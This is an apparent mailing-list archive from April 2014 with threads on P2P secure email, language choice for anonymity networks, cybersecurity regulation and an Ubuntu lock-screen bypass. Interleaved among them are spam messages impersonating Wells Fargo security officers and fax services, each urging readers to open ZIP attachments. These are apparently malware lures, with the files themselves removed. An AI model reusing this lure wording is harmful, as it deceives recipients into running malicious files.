-------------- next part -------------- A non-text attachment was scrubbed... Name: US2716808EU.zip Type: application/zip Size: 6471 bytes Desc: not available URL: From rdohm321 at gmail.com Tue Apr 22 10:56:30 2014 From: rdohm321 at gmail.com (Randolph) Date: Tue, 22 Apr 2014 19:56:30 +0200 Subject: [cryptography] The next gen P2P secure email solution In-Reply-To: References: Message-ID: > > This thread pertains specifically to the use of P2P/DHT models > to replace traditional email as we know it today. *Anonymous Email based on virtual institutions* What about this model? In a network you send your public email encryption key to an "virtual institution". The institution is defined by a name (e.g. AES string) and postal address (e.g. hash key). Having this information added to your node, all your email to you or from you will be stored in the virtual email provider institution. This detaches your nodes IP and encrpytion key from the institution. That means, care-off (c/o) institutions will be able to house 3rd-party e-mail without needing to distribute their own public keys. To create a post office for your friends, two methods exist: 1) Define a common neighbor (e.g Alice and Bob connect to a common webserver as node, and all three have email encryption keys shared), then the webserver stores the emails, even if Alice or Bob are offline. 2) Or/additionally: Create an virtual institution and add the email key of a friend to your node. In case your friend adds the magnet link (which contains name and address of the virtual institution, aka AES key and Hash key) for the institution as well to his node, the institution will save all emails for him (as well from senders, which are not registered at the virtual institution). A Magnet Link allows to share the virtual institution easily. The magnet Uri would look like: *magnet:?in=Gmail&ct=aes256&pa=dotcom&ht=sha512&xt=urn:institution* With this method an email provider can be build without data retention and with the advantage of detached email encrpytion keys from node´s IP addresses. Next to TCP, you can use as well UDP and SCTP as protocol. Virtual Institutions (VI) have been - due to the homepage - introduced by the lib-version 0.9.04 of http://goldbug.sf.net email and chat application. If we understand this right, now everyone can create an email provider without data retention just as a service for friends. In case in a network of connected nodes everyone uses "gmail" as VI-name and "dotcom" as VI-address, everyone will host everyone for email, while all remains encrypted.. could be a nice net or p2p model in a testing. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2806 bytes Desc: not available URL: From hannes at mehnert.org Tue Apr 22 11:48:27 2014 From: hannes at mehnert.org (Hannes Mehnert) Date: Tue, 22 Apr 2014 20:48:27 +0200 Subject: [liberationtech] Programming language for anonymity network In-Reply-To: <5350E1BD.5010304@mpi-sws.org> References: <5350E1BD.5010304@mpi-sws.org> Message-ID: <5356B97B.5000308@mehnert.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA384 Hey, On 04/18/2014 10:26, Stevens Le Blond wrote: > We are a team of researchers working on the design and > implementation of a traffic-analysis resistant anonymity network > and we would like to request your opinion regarding the choice of a > programming language / environment. Here are the criteria: I'm a researcher with some experience in formal methods (http://itu.dk/people/hame) and also software development (https://github.com/hannesm) in different kinds of programming languages. > 1) Familiarity: The language should be familiar or easy to learn > for most potential contributors, as we hope to build a diverse > community that builds on and contributes to the code. > > 2) Maturity: The language implementation, tool chain and libraries > should be mature enough to support a production system. > > 3) Language security: The language should minimize the risk of > security relevant bugs like buffer overflows. > > 4) Security of runtime / tool chain: It should be hard to > inconspicuously backdoor the tool chain and, if applicable, > runtime environments. I actually question whether your criteria is extensive enough. Especially from crypto systems and anonymity systems, I'd want to have a proper specification of the protocol, either by writing it in a logic system or by using a declarative programming language. In my experience, code with lots of shared mutable data (such as object-oriented and imperative programming) tends to produce usable applications quickly, but once you want to go multi-core/multi-threaded or extend at points not thought upfront, the code becomes messy and really hard to maintain. Thus I'd go for some functional programming language where you write most of the time code which does not mutate the heap. Another piece of thought is this static typing vs dynamic typing. While the latter produces prototypes quickly, the former results in much more confidence that the application will actually do the right thing (again, static typing is not a replacement for testing). Your fourth point can be mitigated by a) two compilers to cross-bootstrap [http://cm.bell-labs.com/who/ken/trust.html] and/or b) formalised and small runtimes. At the time being I'd suggest to look into OCaml/Haskell/Erlang or Idris (if you need a really expressive type system), maybe write specifications upfront in Coq/HOL/Lem. I don't see any reason these days to use C/C++ or another unsafe macro-assembly language (and currently develop a TLS stack in pure OCaml to run with openmirage.org / be used by nymote.org). Happy hacking, Hannes -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iQIcBAEBCQAGBQJTVrl7AAoJELyJZYjffCjuxi8P/3jyRJ6nTVbypBQUZ/dH/F28 tx3LTzAAsULtaA6FK+0udRyAVRc/EH3vX6gSjm3lqEayVHg5BSQNfye6mT0efAMX i3/ZUh+JfJ4E8sbgBiaMzqXTvYQGHPyhP3swq3vjwrQCrYn3jeISWAJd2x800KzO pxOU9W1vpx93fVHig5CfvL1EEoLOLDCQ9yWnRJJaNwy1cDncFb8sg7QmjsMpFHus q9w2sQRE6UEdC3Os217uN1OzgylMo8vrbFxbbg4JMGAs08jaovhbMJCucci5q0Zk xrv/903v3hAiprZGnvxMOX45F5JVgAiySbW7M+5Ph0j2xIk7dKs4ceNcem9iLTbJ rewv4MOkmPnYlepCdkdepRDwV2bcWyzN/efeMZpOg4Yg7w4HW4rD7csuvRkX19NM znnLXLRx3VH2UrK1hO9wGjv9RBzGj+eSR/3UxAgPwJ8oZppxMinZgNV+bWmDEgmP XI/Z2RDMGMyyEg6FBK8ArVuEmcND6hSFp8df5kzdOfyXnPK1JQ7w58Vf76hAceSN MVaJ7eEnIvBBYHY6V61ZHs5ix2I2q6b7MYhiE1ku28K6enRCGsW6FcfR2I2rMyyk 5P8zCEhMIG+q4Hy3ri1UO8yPBGmNzI7fo3r0t5WLrEldaUyruLpEHjLvBZnNJa9M PuMhWbd5ETMetRBKtv2V =eO1g -----END PGP SIGNATURE----- From tpb-crypto at laposte.net Tue Apr 22 11:58:50 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Tue, 22 Apr 2014 20:58:50 +0200 Subject: [cryptography] The next gen P2P secure email solution In-Reply-To: References: Message-ID: <1538308832.40108.1398193110797.JavaMail.www@wwinf8228> > Message du 22/04/14 20:30 > De : "Randolph" > > > This thread pertains specifically to the use of P2P/DHT models > > to replace traditional email as we know it today. > > > *Anonymous Email based on virtual institutions* > > What about this model? In a network you send your public email encryption > key to an "virtual institution". > The institution is defined by a name (e.g. AES string) and postal address > (e.g. hash key). Having this information added to your node, all your email > to you or from you will be stored in the virtual email provider > institution. This detaches your nodes IP and encrpytion key from the > institution. That means, care-off (c/o) institutions will be able to house > 3rd-party e-mail without needing to distribute their own public keys. > > To create a post office for your friends, two methods exist: > > 1) Define a common neighbor (e.g Alice and Bob connect to a common > webserver as node, and all three have email encryption keys shared), then > the webserver stores the emails, even if Alice or Bob are offline. > > 2) Or/additionally: Create an virtual institution and add the email key of > a friend to your node. In case your friend adds the magnet link (which > contains name and address of the virtual institution, aka AES key and Hash > key) for the institution as well to his node, the institution will save all > emails for him (as well from senders, which are not registered at the > virtual institution). > > A Magnet Link allows to share the virtual institution easily. The magnet > Uri would look like: > *magnet:?in=Gmail&ct=aes256&pa=dotcom&ht=sha512&xt=urn:institution* > > With this method an email provider can be build without data retention and > with the advantage of detached email encrpytion keys from node´s IP > addresses. Next to TCP, you can use as well UDP and SCTP as protocol. > > Virtual Institutions (VI) have been - due to the homepage - introduced by > the lib-version 0.9.04 of http://goldbug.sf.net email and chat application. > > If we understand this right, now everyone can create an email provider > without data retention just as a service for friends. In case in a network > of connected nodes everyone uses "gmail" as VI-name and "dotcom" as > VI-address, everyone will host everyone for email, while all remains > encrypted.. could be a nice net or p2p model in a testing. > Although technical solutions are feasible, we ought to consider some things: - Email is older than the web itself; - Email has three times as many users as all social networks combined; - Email is entrenched in the offices, many a business is powered by it; Given the enormous energy necessary to remove such an appliance and replace it with something better. How could we make a secure solution that plays nicely with the current tools without disturbing too much what is already established? From hannes at mehnert.org Tue Apr 22 13:04:23 2014 From: hannes at mehnert.org (Hannes Mehnert) Date: Tue, 22 Apr 2014 22:04:23 +0200 Subject: [liberationtech] [p2p-hackers] Programming language for anonymity network In-Reply-To: <5356BFD7.1050705@icsi.berkeley.edu> References: <5350E1BD.5010304@mpi-sws.org> <5356B97B.5000308@mehnert.org> <5356BFD7.1050705@icsi.berkeley.edu> Message-ID: <5356CB47.4050609@mehnert.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA384 On 04/22/2014 21:15, Christof Leng wrote: > I was very happy with Standard ML (non-object-oriented > 'predecessor' of OCAML) for writing complex P2P systems and even > user-land transport protocols. Agreed. I use the Caml part of OCaml. :) > Functional programming and static typing helps to discover subtle > bugs that go unnoticed in imperative languages (and I'm not talking > about something as ridiculous as buffer overruns). > > Unfortunately, Stevens requirement of familiarity still speaks > against functional programming languages, even for something as > popular (and watered-down) as Scala. It's very hard to find code > contributors who know the language or are willing to learn it. But if you have a chance to start from scratch, you should look at possible solutions and use a viable one. Especially the readability and maintainability of a programming language should be considered. Otherwise you end up with a piece of code which is not maintainable once the PhDs have graduated. You have to pay the technical debt at some point. And I'm not sure how to hand over a research project to 'the open source community'... Are there best practices/guidelines availble? I think the OCaml community is rather larger compared to other functional programming languages, and it is very helpful. Both the real world ocaml book, available online https://realworldocaml.org/, and their package management system OPAM, are awesome contributions over the last years to easily start with OCaml and to get more people involved. Cheers, Hannes -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iQIcBAEBCQAGBQJTVstHAAoJELyJZYjffCjuUqcQAKFUvtAfbLu2yU3EEkR5Mjsv N9f19Ao0tIvmU6PmQAEfrdXNhs1e19xFSseaLPEQibxWBbYXTzx+J0es+/H6a116 CcrZ8N51kM/aOydnRTk2NmoP1BYh9X+S3bQRLPu/lYipgYVyuV7ohzZMqmrguARu 15uWjqmvaDahYZhuu4tnfksggveL59pF/08UA5xd8wZ3I+XMiXB7JviN3Mii2rbk 8BjWFFXW66xQGSxg+nsIp+rGiX6r12gCNZZHJHSoQGcmbalGPVF+o2r7+j+D2ZcC n/tXVVgIy2TO+7mxp+ueX+OK5p+YDqOzFTPDKQhARVP+EjEqZXPRKY4YkgMno8ug 7CT4yCuV84gdrNfudOFKTOx4G0k/4OSZzPVn/g1i9vmqAUU8z6UUBr9tjSR1jZq6 iZqDBGkz34550DlPhxE3mwdFh/woBv2ExgrOvM3iSX/dtKBa7p/fCGNHX17dEIgW 0d1DKQatRjuIGIdAjowy8CuJ4rPceoqoObPutLYVw+PeMfSencjDmf9bmXgFI3jB WU6Jo+akCd/BlvABnV2qLnJXqbo3ixM0B7WbI+c5EyQaPapS5J4Im+b66EE9o57Y Ab5Vf7h0GLVovA+VFXbnNCjoiawQo8rKU276Lwid7i8ZByQhm7iX/obMPTQchyKU z5MCXzwWyXnFRt8MbI+G =N6Jn -----END PGP SIGNATURE----- From dan at geer.org Wed Apr 23 05:08:56 2014 From: dan at geer.org (dan at geer.org) Date: Wed, 23 Apr 2014 08:08:56 -0400 Subject: regulation on cybersecurity Message-ID: <20140423120856.C69F62280CC@palinka.tinho.net> The machinery is spinning up. And the Cobbler's Children Have No Shoes .... http://www.lawfareblog.com/2014/04/and-the-cobblers-children-have-no-shoes/ For those who prefer plaintext, lynx --dump yields the following And the Cobbler's Children Have No Shoes .... By [32]Paul Rosenzweig Monday, April 21, 2014 at 7:00 AM For quite some time, it has been apparent that the announcement of the [33]NIST Cybersecurity Framework would be a seminal event. Though couched as a voluntary program, many expected that [34]the Framework would become the de facto ground for liability. After all, if the National Institute for Standards and Technology has determined a baseline framework for optimal security in the cyber domain, [35]what could be more negligent than failing to meet that minimum standard? Unsurprisingly, the penny has begun to drop. Not, as one might have expected, in private sector tort suits, but in public sector regulatory action. Last week, the Securities and Exchange Commission[36] announced its intention to conduct an examination of the cybersecurity of 50 broker-dealers and investment advisers subject to its jurisdiction. The [37]questionnaire derives much of its content from the NIST Framework--so now the Framework will be the likely potential ground for regulatory action. How ironic then, that in the same week, [38]the GAO issued a report critical of the SEC for its own [39]lack of adequate cybersecurity and oversight. Perhaps the cobbler's children don't have any shoes .... 32. http://www.lawfareblog.com/author/paul/ 33. http://www.lawfareblog.com/2014/02/nist-cybersecurity-framework-issued/ 34. http://safegov.org/2013/11/1/the-nist-cybersecurity-framework-and-incentives 35. http://www.newrepublic.com/article/115187/cybersecurity-liability-court-cases-are-changing-blame-game 36. http://www.digitalcrazytown.com/2014/04/sec-issues-nist-inspired-cybersecurity.html 37. http://www.sec.gov/ocie/announcement/Cybersecurity+Risk+Alert++%2526+Appendix+-+4.15.14.pdf 38. http://www.gao.gov/products/GAO-14-419 39. http://online.wsj.com/news/articles/SB10001424052702304626304579508100407450502 From gwen at cypherpunks.to Wed Apr 23 09:50:08 2014 From: gwen at cypherpunks.to (gwen hastings) Date: Wed, 23 Apr 2014 09:50:08 -0700 Subject: regulation on cybersecurity In-Reply-To: <37DA50E0-28BE-4381-82A8-4F2D6B4F33F1@gmail.com> References: <20140423120856.C69F62280CC@palinka.tinho.net> <37DA50E0-28BE-4381-82A8-4F2D6B4F33F1@gmail.com> Message-ID: <5357EF40.70803@cypherpunks.to> looters and fucking tax thieves all gwen On 4/23/14 7:43 AM, Robert Hettinga wrote: > On Apr 23, 2014, at 8:08 AM, dan at geer.org wrote: > >> The machinery is spinning up. > “Just think, if we could just pass a few more laws, we could *all* be criminals.” — Vinnie Moscaritolo -- Tentacle #99 ecc public key curve p25519(pcp 0.15) 1l0$WoM5C8z=yeZG7?$]f^Uu8.g>4rf#t^6mfW9(rr910 Governments are instituted among men, deriving their just powers from the consent of the governed, that whenever any form of government becomes destructive of these ends, it is the right of the people to alter or abolish it, and to institute new government, laying its foundation on such principles, and organizing its powers in such form, as to them shall seem most likely to effect their safety and happiness.’ https://github.com/TLINDEN/pcp.git to get pcp(curve25519 cli) https://github.com/stef/pbp.git (curve 25519 python based cli) -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x42AA24D5.asc Type: application/pgp-keys Size: 70878 bytes Desc: not available URL: From drwho at virtadpt.net Wed Apr 23 10:00:09 2014 From: drwho at virtadpt.net (The Doctor) Date: Wed, 23 Apr 2014 10:00:09 -0700 Subject: Fw: NSA good guys In-Reply-To: References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop> Message-ID: <5357F199.6010601@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/22/2014 12:29 PM, grarpamp wrote: > know what it does. Some speculate at least the US uses angled > optical/radar shields to hide the bulk of some crafts from > ground/orbital view. Sounds There is speculation and some evidence along those lines in the book _Blank Spots on the Map_ by Trevor Paglen. No evidence (they weren't in orbit, after all) but the logic makes sense. > Seems really difficult to fly and calibrate. ie: would certainly > need better than gps timing onboard each. Maybe 1km pyramid of four > could range each other well enough, no idea. As Jim referenced, > membranes and To the best of my knowledge (which is about six months out of date), satellite swarms that would act in a similar fashion to what is described above are still in their infancy. I do not believe any have been launched yet (if I did, I probably wouldn't be able to posts to mailing lists like this...) - -- The Doctor [412/724/301/703] [ZS] Developer, Project Byzantium: http://project-byzantium.org/ PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Phenomenal cosmic powers be damned - I have a lease." --Harry Dresden -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEAREKAAYFAlNX8ZkACgkQO9j/K4B7F8ELFgCeOImdt5KQZ4S4QNY4jZCPTkJz h5kAoOYJq51nmNUh/dQEDohYmqHBghEt =URKp -----END PGP SIGNATURE----- From hettinga at gmail.com Wed Apr 23 07:43:23 2014 From: hettinga at gmail.com (Robert Hettinga) Date: Wed, 23 Apr 2014 10:43:23 -0400 Subject: regulation on cybersecurity In-Reply-To: <20140423120856.C69F62280CC@palinka.tinho.net> References: <20140423120856.C69F62280CC@palinka.tinho.net> Message-ID: <37DA50E0-28BE-4381-82A8-4F2D6B4F33F1@gmail.com> On Apr 23, 2014, at 8:08 AM, dan at geer.org wrote: > The machinery is spinning up. “Just think, if we could just pass a few more laws, we could *all* be criminals.” — Vinnie Moscaritolo -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: Message signed with OpenPGP using GPGMail URL: From dan at geer.org Wed Apr 23 10:31:04 2014 From: dan at geer.org (dan at geer.org) Date: Wed, 23 Apr 2014 13:31:04 -0400 Subject: Fw: NSA good guys In-Reply-To: Your message of "Wed, 23 Apr 2014 10:00:09 PDT." <5357F199.6010601@virtadpt.net> Message-ID: <20140423173104.51D4E2280A4@palinka.tinho.net> | To the best of my knowledge (which is about six months out of date), | satellite swarms that would act in a similar fashion to what is | described above are still in their infancy. I do not believe any have | been launched yet (if I did, I probably wouldn't be able to posts to | mailing lists like this...) Get thee to the stream at http://www.cubesat.org/ --dan From Kathrine.Pickens at wellsfargo.com Wed Apr 23 11:50:45 2014 From: Kathrine.Pickens at wellsfargo.com (Kathrine Pickens) Date: Wed, 23 Apr 2014 13:50:45 -0500 Subject: FW: Account statements Message-ID: <1DFVKF06.5502254@rms-network.com> Please check out your latest account statements. Kathrine Pickens Level III Security Officer 817-520-1641 office 817-311-0626 cell Kathrine.Pickens at wellsfargo.com Investments in securities and insurance products are: NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed. If you are not the intended recipient of this message, please be advised that any dissemination, distribution, or use of the contents of this message is strictly prohibited. If you received this message in error, please notify the sender. Please also permanently delete all copies of the original message and any attached documentation. Thank you. -------------- next part -------------- A non-text attachment was scrubbed... Name: statement.pdf Type: application/pdf Size: 19456 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: statement.zip Type: application/zip Size: 10307 bytes Desc: not available URL: From grarpamp at gmail.com Wed Apr 23 14:15:33 2014 From: grarpamp at gmail.com (grarpamp) Date: Wed, 23 Apr 2014 17:15:33 -0400 Subject: Fw: NSA good guys In-Reply-To: <20140423173104.51D4E2280A4@palinka.tinho.net> References: <5357F199.6010601@virtadpt.net> <20140423173104.51D4E2280A4@palinka.tinho.net> Message-ID: On Wed, Apr 23, 2014 at 1:31 PM, wrote: > http://www.cubesat.org/ Yes, and unlikely anyone will be packing enough atomic clock, optics, comms, compute, and attitude control in 10cm3 cluster anytime soon. Though estimating what resolving power (or listening capability) one could get per 10cm3 in low orbit would be interesting. https://en.wikipedia.org/wiki/Global_Positioning_System https://en.wikipedia.org/wiki/Sounding_rocket https://en.wikipedia.org/wiki/Unmanned_aerial_vehicle http://www.dunveganspace.com/milestones http://deepspaceindustries.com/ From incomefax at telesp.net.br Wed Apr 23 13:23:37 2014 From: incomefax at telesp.net.br (INCOMING FAX) Date: Wed, 23 Apr 2014 17:23:37 -0300 Subject: You have received a new fax message Message-ID: <38021.9040300@telesp.net.br> Incoming fax from GHM80470563 at jfet.org Scan date: Wed, 23 Apr 2014 17:23:37 -0300 Number of page(s): 3 Resolution: 400x400 DPI _________________________________ Attached file is scanned image in PDF format. Adobe(R)Reader(R) can be downloaded from the following URL: http://www.adobe.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: Scan141475705848.ZIP Type: application/zip Size: 6443 bytes Desc: not available URL: From fax at jfet.org Wed Apr 23 10:11:30 2014 From: fax at jfet.org (INTERNAL FAX) Date: Wed, 23 Apr 2014 18:11:30 +0100 Subject: New Fax: 2 pages Message-ID: Scanned from MFP04819191 by jfet.org Date: Wed, 23 Apr 2014 18:11:30 +0100 Pages: 2 Resolution: 200x200 DPI ---------------------------------------- -------------- next part -------------- A non-text attachment was scrubbed... Name: FAX972639.pdf Type: application/pdf Size: 18 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: FAX975009.zip Type: application/zip Size: 6466 bytes Desc: not available URL: From grarpamp at gmail.com Wed Apr 23 15:28:20 2014 From: grarpamp at gmail.com (grarpamp) Date: Wed, 23 Apr 2014 18:28:20 -0400 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <20140419134510.GA3833@sivokote.iziade.m$> References: <20140419134510.GA3833@sivokote.iziade.m$> Message-ID: > Does a society of sheep deserve a government of wolves? Evolution might say that both sheep and wolf share some common ancestor. One diverged docile, or even without that gene theory, sheep are still eaten because they fail to fight back. Do not be dog food, cast off your warm fuzzy wools and become fighters in the ring. From Virgie.Schaefer at wellsfargo.com Wed Apr 23 11:26:02 2014 From: Virgie.Schaefer at wellsfargo.com (Virgie Schaefer) Date: Wed, 23 Apr 2014 19:26:02 +0100 Subject: FW: Account statements Message-ID: Please check out your latest account statements. Virgie Schaefer Level III Security Officer 817-547-8270 office 817-295-2895 cell Virgie.Schaefer at wellsfargo.com Investments in securities and insurance products are: NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed. If you are not the intended recipient of this message, please be advised that any dissemination, distribution, or use of the contents of this message is strictly prohibited. If you received this message in error, please notify the sender. Please also permanently delete all copies of the original message and any attached documentation. Thank you. -------------- next part -------------- A non-text attachment was scrubbed... Name: statement.pdf Type: application/pdf Size: 19456 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: statement.zip Type: application/zip Size: 10307 bytes Desc: not available URL: From pgut001 at cs.auckland.ac.nz Wed Apr 23 09:19:30 2014 From: pgut001 at cs.auckland.ac.nz (Peter Gutmann) Date: Thu, 24 Apr 2014 04:19:30 +1200 Subject: Fine grain Cross-VM Attacks on Xen and VMware (AES) In-Reply-To: <4d480631ba7505e3c43b7bbe66c2e5e7@cryptolab.net> Message-ID: Griffin Boyce writes: >'AES in a number popular cryptographic libraries including OpenSSL, PolarSSL >and Libgcrypt are vulnerable to Bernstein’s correlation attack when run in >Xen and VMware virtual machines, the most popular VMs used by cloud service >providers.' That's just another proof of the inverse of Law #1 of the 10 Immutable Laws of Security, "If a bad guy can persuade you to run his program on your computer, it’s not your computer any more". The inverse is the Immutable Law of Cloud Computing Security, "If a bad guy can persuade you to run your program on his computer, it’s not your program any more". Peter. From stephan.neuhaus at tik.ee.ethz.ch Wed Apr 23 23:43:08 2014 From: stephan.neuhaus at tik.ee.ethz.ch (Stephan Neuhaus) Date: Thu, 24 Apr 2014 08:43:08 +0200 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: References: <20140419134510.GA3833@sivokote.iziade.m$> Message-ID: <5358B27C.8010903@tik.ee.ethz.ch> On 2014-04-24, 00:28, grarpamp wrote: >> Does a society of sheep deserve a government of wolves? > > Evolution might say that both sheep and wolf share some common > ancestor. One diverged docile, or even without that gene theory, > sheep are still eaten because they fail to fight back. Do not be dog > food, cast off your warm fuzzy wools and become fighters in the > ring. Or, to put it more succinctly: WAKE UP, SHEEPLE! Fun, Stephan From cathalgarvey at cathalgarvey.me Thu Apr 24 01:04:32 2014 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Thu, 24 Apr 2014 09:04:32 +0100 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <5358B27C.8010903@tik.ee.ethz.ch> References: <20140419134510.GA3833@sivokote.iziade.m$> <5358B27C.8010903@tik.ee.ethz.ch> Message-ID: <5358C590.9050005@cathalgarvey.me> > WAKE UP, SHEEPLE! I'm glad someone finally called this thread what it is. On 24/04/14 07:43, Stephan Neuhaus wrote: > On 2014-04-24, 00:28, grarpamp wrote: >>> Does a society of sheep deserve a government of wolves? >> >> Evolution might say that both sheep and wolf share some common >> ancestor. One diverged docile, or even without that gene theory, >> sheep are still eaten because they fail to fight back. Do not be dog >> food, cast off your warm fuzzy wools and become fighters in the >> ring. > > Or, to put it more succinctly: > > WAKE UP, SHEEPLE! > > Fun, > > Stephan > -- T: @onetruecathal, @IndieBBDNA P: +353876363185 W: http://indiebiotech.com -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x988B9099.asc Type: application/pgp-keys Size: 6176 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 901 bytes Desc: OpenPGP digital signature URL: From incomefax at fm-dyn-139-228-231-19.fast.net.id.jfet.org Wed Apr 23 19:08:24 2014 From: incomefax at fm-dyn-139-228-231-19.fast.net.id.jfet.org (INCOMING FAX) Date: Thu, 24 Apr 2014 09:08:24 +0700 Subject: You have received a new fax message Message-ID: <36783.8070209@fm-dyn-139-228-231-19.fast.net.id> Incoming fax from GHM03966250 at jfet.org Scan date: Thu, 24 Apr 2014 09:08:24 +0700 Number of page(s): 5 Resolution: 400x400 DPI _________________________________ Attached file is scanned image in PDF format. Adobe(R)Reader(R) can be downloaded from the following URL: http://www.adobe.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: Scan132213385577.ZIP Type: application/zip Size: 6443 bytes Desc: not available URL: From grarpamp at gmail.com Thu Apr 24 10:30:30 2014 From: grarpamp at gmail.com (grarpamp) Date: Thu, 24 Apr 2014 13:30:30 -0400 Subject: AirChat radio, and cryptolaw Message-ID: https://github.com/lulzlabs/AirChat/ http://www.computerworld.com.au/article/543477/should_australians_prepare_rubber-hose_cryptanalysis_/ From grarpamp at gmail.com Fri Apr 25 08:18:34 2014 From: grarpamp at gmail.com (grarpamp) Date: Fri, 25 Apr 2014 11:18:34 -0400 Subject: "Population Management" Message-ID: https://publicintelligence.net/identity-dominance/ From dan at geer.org Sun Apr 27 09:06:32 2014 From: dan at geer.org (dan at geer.org) Date: Sun, 27 Apr 2014 12:06:32 -0400 Subject: Poul-Henning Kamp Message-ID: <20140427160633.05E2A2280BC@palinka.tinho.net> The talk Poul-Henning Kamp gave 12 Feb at FOSDEM http://www.youtube.com/watch?v=fwcl17Q0bpk parallels a half-dozen different threads found here. Carefully adjust your skepticism knob before listening (30m talk, 15m Q&A). --dan Scepticism is the chastity of the intellect; it is shameful to give it up too soon, or to the first comer. -- George Santayana From jya at pipeline.com Mon Apr 28 04:19:13 2014 From: jya at pipeline.com (John Young) Date: Mon, 28 Apr 2014 07:19:13 -0400 Subject: [Cryptography] GCC bug 30475 (was Re: bounded pointers in C) In-Reply-To: <99235eb92bed605e96b77d03fb29e812@xs4all.nl> References: <1DA6B497-5D5F-4FF6-B0D4-1B1FFC1D9644@me.com> <535D6F5F.6050409@xs4all.nl> <201404280217.s3S2HQqW008448@new.toad.com> <99235eb92bed605e96b77d03fb29e812@xs4all.nl> Message-ID: The criminal liability of NSA, other spies corps, orgs and comsec wizards in de facto complicit deception and exploitation of the public is a worthy topic to drag out of the hideaways. It might be demonizing of the valiant code warriors to be described as a Racketeer Influenced Criminal Organization operating under the cheerfully duplicitous Open Source. Open secrecy is the main tool of these sub rosa hoodlums, Mafioso mathematicians wiggling out of responsibility by algo shadiness and protestations of public service on behalf of working around censorship to free the slaves for better use producing cream for the privacy milkers. Top of the cream milkers adopt the aggrieved innocence when caught red-handed rustling public cattle, hello Mr. Bundy. So sue me, they laugh, knowing no jury could possibly grasp the arcane lingo the bozos use to semaphor signals about their nefaria promoted as good for the commonweal. Subsidize us, befuddled citz, kachink. A huge market ripoff, comsec, privacy and freedom of the Internet. Simple beginnings with a few crafty ne'er do well engineers, mathematicians and scientists, avoiding penal labor in labs, factories and spynests, setting up a quiet racket to control and monetize crypto, comsec and privacy while selling hacks and snitching to the fuzz downtown. Which has produced a boom in profits and reputations for the TLA- and nick-named coders, hackers, exploiters, leakers, promoters, apologists, yes, even populist heros and awards winners from Anonymous to Alexander to Snowden and this very list of who's who in wily coyotes. Code-wielding Corsicans never had it so good since the opening of the Internet frontier to unfettered gangsters claiming to be comsec enforcers for Judge Roy Bean west of Silicon Valley). Just saying howdy to my gang of cypherpunks free rangers for whom working around law-enforcement fences while informing, backdooring, and cheating on each other is top secret code of silence Omerta. From dal at riseup.net Mon Apr 28 14:02:17 2014 From: dal at riseup.net (Douglas Lucas) Date: Mon, 28 Apr 2014 16:02:17 -0500 Subject: DoJ tried to stop Barrett Brown's criticism of gov Message-ID: <535EC1D9.1080706@riseup.net> This morning WhoWhatWhy published my new article, "Silencing Barrett Brown." I obtained the transcript of the hacktivist journo's September 4 gag hearing, which revealed bench conference conversations that were inaudible from the gallery when I attended. The transcript shows the prosecution asked the judge to stop Brown's wide-ranging criticism of the government in general, claiming that his anti-authority "tone" in one of his Guardian articles was "problematic." My article also provides an update on his case and plea deal. http://whowhatwhy.com/2014/04/28/silencing-barrett-brown/ From eric at konklone.com Tue Apr 29 10:35:54 2014 From: eric at konklone.com (Eric Mill) Date: Tue, 29 Apr 2014 13:35:54 -0400 Subject: Ubuntu bug 1308572 In-Reply-To: <20140429133051.GA17929@sivokote.iziade.m$> References: <20140429133051.GA17929@sivokote.iziade.m$> Message-ID: On Tue, Apr 29, 2014 at 9:30 AM, Georgi Guninski wrote: > Ubuntu bug 1308572 > > https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572 > > ----- > affects ubuntu > > Hello, > I am running Ubuntu 14.04 with all the packages updated. > When the screen is locked with password, if I hold ENTER after some > seconds the screen freezes and the lock screen crashes. After that I > have the computer fully unlocked. Fortunately, the final comment says: "Just a sidenote: Unlike what the sensationalist article at heise.de from today suggests (which links here), this bug was fixed in a heroc effort over night *before* final release, the fix is on the 14.04 image that was released to end users." > > -- > Marco Agnese > > This bug is about the lockscreen being bypassed when unity crashes/restarts, which is a critcal security issue. The crash will be handled from bug 1308750 > ----- > -- konklone.com | @konklone From guninski at guninski.com 